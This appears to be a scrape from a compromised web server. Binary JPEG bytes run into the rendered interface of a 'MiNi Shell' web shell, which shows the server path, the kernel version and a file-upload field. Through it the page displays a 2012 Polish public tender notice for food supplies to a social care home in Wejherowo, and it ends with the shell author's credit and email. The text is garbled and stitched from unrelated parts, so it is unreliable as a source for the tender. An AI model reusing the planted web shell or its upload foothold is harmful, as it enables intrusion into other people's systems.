JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121211/262259-N-2012.html

<p class="kh_header"><b>Wejherowo: Dostawa różnych produktów spożywczych , zbożowych , jaj,  warzyw, ziemniaków, owoców i ich przetworów na  potrzeby Domu Pomocy Społecznej w Wejherowie</b><br>
<b>Numer ogłoszenia: 262259 - 2012; data zamieszczenia: 11.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Przebendowskiego 1, 84-200 Wejherowo, woj. pomorskie, tel. 0-58 672-15-91, faks 0-58 672-67-11.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa różnych produktów spożywczych , zbożowych , jaj,  warzyw, ziemniaków, owoców i ich przetworów na  potrzeby Domu Pomocy Społecznej w Wejherowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Aromaty                  10ml-szt	szt.	70	 	 	 	 	 	 
2.	Cukier waniliowy   16g-szt	szt.	230	 	 	 	 	 	 
3.	Cynamon                  20g -szt.                            	szt 160	 	 	 	 	 	 
4.	Herbata granulowana 100g-szt.	szt.	320	 	 	 	 	 	 
5.	Kakao   80g-szt	szt.	150	 	 	 	 	 	 
6.	Kwasek cytrynowy                   20g-szt.	szt.	180	 	 	 	 	 	 
7.	Liście laurowe 7g-szt	szt.	90	 	 	 	 	 	 
8.	Musztarda 480g-szt	szt.	280	 	 	 	 	 	 
9.	Ocet spirytusowy 10% -0,5 litra -szt.	szt.	12	 	 	 	 	 	 
10.	Papryka mielona słodka  i ostra 16g-szt	szt.	110	 	 	 	 	 	 
11.	Pieprz naturalny   20g-szt.	szt.	200	 	 	 	 	 	 
12.	Proszek do pieczenia 18g-szt	szt.	100	 	 	 	 	 	 
13.	Przyprawa do piernika  25g-szt	szt.	10	 	 	 	 	 	 
14.	Soda oczyszczona 30g -szt.	szt.	15	 	 	 	 	 	 
15.	Sól paczkowana 1kg	kg	350	 	 	 	 	 	 
16.	Ziele angielskie 15g-szt	szt.	100	 	 	 	 	 	 


17	Goździki15g-  szt.	szt.	5	 	 	 	 	 	 
18	Budyń  40g-szt. szt.	400	 	 	 	 	 	 
19	Galaretki   75g-szt.	szt.	350	 	 	 	 	 	 
20	Przyprawa warzywna 1000g	szt.	20	 	 	 	 	 	 
21	Kawa zbożowa 500g-szt	szt.	100	 	 	 	 	 	 
22	Keczup łagodny 500g-szt.	szt.	300	 	 	 	 	 	 
23         Kisiel 38g-szt	szt.	450	 	 	 	 	 	 
24	Majonez 600g-szt	szt.	50	 	 	 	 	 	 
25	Pieprz ziołowy 20g-szt.	szt.	50	 	 	 	 	 	 
26	Przyprawa magii 1litr-szt	szt.	350	 	 	 	 	 	 
27	Rodzynki 100g-szt.	szt.	25	 	 	 	 	 	 
28	Żelatyna    50g-szt	szt.	270	 	 	 	 	 	 
29	Żurek w butelce 0,5l-szt	szt.	15	 	 	 	 	 	 
30	Śliwki suszone 125g-szt	szt.	5	 	 	 	 	 	 
31	Mąka ziemniaczana  1kg	kg	20	 	 	 	 	 	 

32
	Banany 1kg                            	kg	60	 	 	 	 	 	 
33
	Cytryny  1kg	kg	30	 	 	 	 	 	 
34	Dżem wiśniowy 280g-szt  n/słodzony	szt.	20	 	 	 	 	 	 
35	Kompot śliwkowy  900ml-szt	szt.	200	 	 	 	 	 	 
36	Marmolada 500g-szt	szt.	10	 	 	 	 	 	 
37	Mandarynki  1kg 	kg	50	 	 	 	 	 	 
38	Powidła 280g  -szt.	szt.	10	 	 	 	 	 	 
39	Pomarańcze 1kg	kg	30	 	 	 	 	 	 
40	Syrop  380 ml -szt.	szt.	1100	 	 	 	 	 	 
41	Śliwki suszone - 1kg	kg	1	 	 	 	 	 	 
42	Cukier puder  1kg	kg	45	 	 	 	 	 	 
43	Cukier torebki  1kg	kg	900	 	 	 	 	 	 
44	Miód naturalny pszczeli 400g-szt	szt.	5	 	 	 	 	 	 

45	Miód sztuczny  340g-szt	szt.	80	 	 	 	 	 	 
46	Fasolka szparagowa szt-460g	szt.	500	 	 	 	 	 	 
47	Groszek konserwowy 400g-szt	szt.	160	 	 	 	 	 	 
48	Chrzan 170g-szt	szt.	40	 	 	 	 	 	 
49	Ćwikła z chrzanem 300g -szt.	szt.	30	 	 	 	 	 	 
50	Kapusta kiszona 1 kg	kg	250	 	 	 	 	 	 
51	Koncentrat pomidorowy 900g-szt	szt.	130	 	 	 	 	 	 
52	Majeranek 6g -szt.	szt.	170	 	 	 	 	 	 
53	Marchew  z groszkiem 470g-szt	szt.	200	 	 	 	 	 	 
54	Ogórki konserwowe 870g-szt	szt.	250	 	 	 	 	 	 
55	Ogórki kiszone 1kg	kg	700	 	 	 	 	 	 
56	mak-1 kg	kg	10	 	 	 	 	 	 
57	Olej 1 litr -szt.	szt.	40	 	 	 	 	 	 



				               



 58	Olej    3 litr -szt.	szt.	60	 	 	 	 	 	 
59	Kasza gryczana 1 kg	kg	5	 	 	 	 	 	 
60	Kasza manna 1 kg	kg	130	 	 	 	 	 	 
61	Kasza mazurska  1kg	kg	50	 	 	 	 	 	 
62	Kasa wiejska 1kg	kg	50	 	 	 	 	 	 
63	Makaron nitki 400g-szt(nie mniej niż 4 jajeczny	szt.	50	 	 	 	 	 	 
64	Makaron kolanko  400g- szt. (nie mniej niż 4 jajeczny)	szt.	50	 	 	 	 	 	 
65	Makaron świderki 400g-szt(nie mniej niż 4 jajeczny)	szt.	50	 	 	 	 	 	 
66	Mąka tortowa 1kg- typ 500	kg	30	 	 	 	 	 	 
67	Mąka wrocławska 1kg - typ 500	kg	500	 	 	 	 	 	 
68	Płatki owsiane  1kg	kg	30	 	 	 	 	 	 
69	Ryż biały dlugoziarnisty  1kg	kg	50	 	 	 	 	 	 
70	Gruszki	kg	20	 	 	 	 	 	 
71	Jabłka  1kg	kg	1500	 	 	 	 	 	 

72	Truskawki kg	50	 	 	 	 	 	 
73	Fasola Jaś 	kg	20	 	 	 	 	 	 
74	Fasolka drobna 	kg	20	 	 	 	 	 	 
75	Fasolka szparagowa  	kg	40	 	 	 	 	 	 
76	Groch łuskany 	kg	40	 	 	 	 	 	 
77	Botwina pęczki	pęczki	30	 	 	 	 	 	 
78	Buraki 	kg	700	 	 	 	 	 	 
79	Brukiew 	kg	120	 	 	 	 	 	 
80	Cebula 	kg	280	 	 	 	 	 	 
81	Czosnek  	kg	5	 	 	 	 	 	 
82	Kapusta świeża główki	szt.	700	 	 	 	 	 	 
83	Kapusta świeża 	kg	100	 	 	 	 	 	 

                                                                                                                                                            



                                                                                                                                                       
 84	Kalafior 	szt.	250	 	 	 	 	 	 
85	Koperek-	pęczki	750	 	 	 	 	 	 
86	Marchew  	kg	1900	 	 	 	 	 	 
87	Ogórki świeże  	kg	110	 	 	 	 	 	 
88	Por 	kg	430	 	 	 	 	 	 
89	Pietruszka  	kg	450	 	 	 	 	 	 
90	Pieczarki  kg	90	 	 	 	 	 	 
91	Pomidory kg	180	 	 	 	 	 	 
92	Rzodkiewki 	pęczki	90	 	 	 	 	 	 
93	Szczypior 	pęczki	280	 	 	 	 	 	 
94	Seler  	kg	560	 	 	 	 	 	 
95	Sałata    główki	główki	600	 	 	 	 	 	 
96	Zielona pietruszka 	pęczki	710	 	 	 	 	 	 
97	Ziemniaki 	kg	11600	 	 	 	 	 	 
98	Jaja - szt.Klasa L	szt.	15500.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.61.33.00-1, 03.14.25.00-3, 03.10.00.00-2, 15.33.22.00-6, 15.83.00.00-5, 15.41.11.00-3, 15.84.00.00-8, 15.87.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia, w szczególności o zamówienie mogą ubiegać się Wykonawcy , którzy w okresie ostatnich 3 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej dwie dostawy odpowiadające swoim rodzajem przedmiotowi zamówienia, o wartości netto nie mniejszej niż: 150 000,00 zł. / sto pięćdziesiąt tysięcy złotych netto/ 
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych lub wykonywanych dostaw sporządzony według wzoru stanowiącego załącznik nr  5 do niniejszej SIWZ oraz dokumenty potwierdzające należyte wykonanie zamówienia( referencje ) .
Wykonawcy składający ofertę wspólną przedstawią razem jeden dokument w formie załącznika nr 5 oraz dokumenty potwierdzające , iż dostawy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą się ubiegać Wykonawcy, których sytuacja ekonomiczna i finansowa pozwoli na wykonanie zamówienia, w szczególności o zamówienie mogą ubiegać się Wykonawcy, którzy złożą oświadczenie o spełnianiu warunku  art.22 ust1, według wzoru stanowiącego załącznik nr 3.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a.Zmiany postanowień zawartej umowy w stosunku do treści oferty, na
podstawie której dokonano wyboru Wykonawcy mogą nastąpić za zgodą obu stron wyrażoną na  piśmie pod rygorem nieważności , gdy zmiana w trakcie realizacji umowy dotyczy :                       -  ustawowej zmiany stawki podatku VAT , przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian. 
- przekształcenie firmy, zmiana nazwy firmy, zmiany adresu, zmiany banku obsługującego
Wykonawcę lub Zamawiającego-Spisanie aneksu do umowy uwzględniającego dokonane zmiany,
- innych okoliczności, nie przewidzianych w SIWZ, a zmiany te są korzystne dla Zamawiającego.
Zmiany wymienione  powyżej mogą być dokonane wyłącznie w formie aneksu do umowy w terminie 14 dni od przesłania pisemnego zawiadomienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpswejherowo.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej  w  Wejherowie , ul. Przebendowskiego 1 , 
84-200 Wejherowo; 
 telefon 58 672-15-91, fax.58 672-67-11, mail: dpswejherowo@gmail.com,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2012 godzina 08:00, miejsce: Dom Pomocy Społecznej w Wejherowie, ul. Przebendowskiego 1 - sekretariat/kadry.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com